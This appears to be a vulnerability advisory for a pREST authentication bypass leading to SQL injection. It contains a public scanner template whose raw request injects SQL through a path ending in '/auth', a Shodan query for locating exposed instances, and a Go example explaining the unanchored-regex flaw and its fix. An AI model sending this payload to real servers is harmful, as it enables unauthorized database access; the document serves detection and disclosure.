prest-sqli-auth-bypass: pREST < 1.5.4 - SQL Injection Via Authentication Bypass

Date: 2025-08-01 | Affected software: pREST | PoC: public

Vulnerability description

An authentication bypass vulnerability was introduced by changing the JWT whitelist configuration to use a regex pattern, allowing unauthorized access to any path containing /auth and leading to SQL Injection.

PoC code [public]

id: prest-sqli-auth-bypass

info:
  name: pREST < 1.5.4 - SQL Injection Via Authentication Bypass
  author: mihail8531,iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability was introduced by changing the JWT whitelist configuration to use a regex pattern, allowing unauthorized access to any path containing /auth and leading to SQL Injection.
  reference:
    - https://github.com/advisories/GHSA-wm25-j4gw-6vr3
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"authorization token is empty"
  tags: sqli,prest,auth-bypass,sqli,vuln

variables:
  database: "{{database}}"

http:
  - raw:
      - |
        GET /{{database}}/information_schema".tables)s%20where%201=version()::int--/auth HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'pq: invalid input syntax for type integer: \"PostgreSQL '

      - type: word
        part: content_type
        words:
          - 'application/json'
# digest: 4a0a0047304502202f2f600491f4419ec9cbee88330433452dd222db375ffa91052ad85f3e8b1448022100c12ca182c098a067a287fe7fd58786f610375395bc4e07503f083f0c61cc11b7:922c64590222798bb761d5b6d8e72950
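The root cause described above is a whitelist pattern that matches anywhere in the request path instead of only the exact endpoint. The following added example (not pREST's own code, and a simplification of its middleware) models a regex-based JWT whitelist with Go's regexp package and shows why an unanchored "/auth" pattern exempts unrelated paths, such as a table named "authors", while an anchored pattern does not:

```go
package main

import (
	"fmt"
	"regexp"
)

// Whitelisted reports whether a request path is exempt from JWT checks
// under the given regex patterns. Illustrative only; pREST's real
// middleware is not reproduced here.
func Whitelisted(path string, patterns []string) bool {
	for _, p := range patterns {
		if regexp.MustCompile(p).MatchString(path) {
			return true
		}
	}
	return false
}

// WeakPatterns is an unanchored pattern: any path containing "/auth" matches.
var WeakPatterns = []string{"/auth"}

// FixedPatterns anchors the pattern so only the exact endpoint is exempt.
var FixedPatterns = []string{`^/auth$`}

// SamplePaths are constructed request paths: the real login endpoint, a
// table whose name happens to start with "auth", and a resource path with
// "/auth" appended as a trailing segment.
var SamplePaths = []string{
	"/auth",
	"/mydb/public/authors",
	"/mydb/public/users/auth",
}

func main() {
	for _, p := range SamplePaths {
		fmt.Printf("%-28s weak=%-5v fixed=%v\n",
			p, Whitelisted(p, WeakPatterns), Whitelisted(p, FixedPatterns))
	}
}
```

With the weak pattern every sample path is exempt from authentication; with the anchored pattern only "/auth" is.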
